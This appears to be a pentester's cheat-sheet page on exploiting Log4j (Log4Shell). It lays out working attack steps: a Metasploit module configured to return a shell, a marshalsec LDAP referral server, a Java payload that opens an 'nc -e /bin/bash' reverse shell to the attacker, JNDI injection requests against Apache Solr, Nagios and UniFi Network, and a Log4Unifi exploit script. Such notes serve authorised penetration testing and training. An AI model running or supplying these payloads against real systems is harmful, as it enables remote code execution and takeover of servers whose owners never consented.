Exploit Notes

Log4j Pentesting

Last modified: 2023-02-14

Apache Web

Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.

msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell

Exploit Apache Solr (JNDI)

You need to prepare your four local terminals.

1. Start LDAP Server on Your Local Terminal 1

  1. Install Maven

    sudo apt install maven

  2. Get the Payload

    Download the repository.

    git clone https://github.com/mbechler/marshalsec.git
cd marshalsec

    Then build the marshalsec utility

    mvn clean package -DskipTests

  3. Start LDAP Server

    java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"

2. Host the Exploit on Your Local Terminal 2

  1. Create the Exploit with Java

    First, create a new directory and create a new exploit named "Exploit.java" in the directory.
    Open your favorite editor like vim.

    mkdir exploit
cd exploit
vim Exploit.java

    In editor, enter the following code.

    public class Exploit {
static {
    try {
        java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
    } catch (Exception e) {
        e.printStackTrace();
    }
}
}

  2. Compile the Payload

    javac Exploit.java -source 8 -target 8

  3. Start Web Server to Host the Payload

    python3 -m http.server 8000

3. Open Listener on Your Local Terminal 3

nc -lvnp <your-local-listener-port>

4. Send Request the Target Website

# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'

Exploit Unifi Network using Log4Unifi

Log4Unifi is an exploitation Log4j tool in Unifi Network.

1. Test the Vulnerability in the Target Web Page

curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'

2. Open Listener on Your Local Machine

nc -lvnp 4444

3. Exploit

Download the exploit from the repository.

git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4Unifi

Exploit

python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444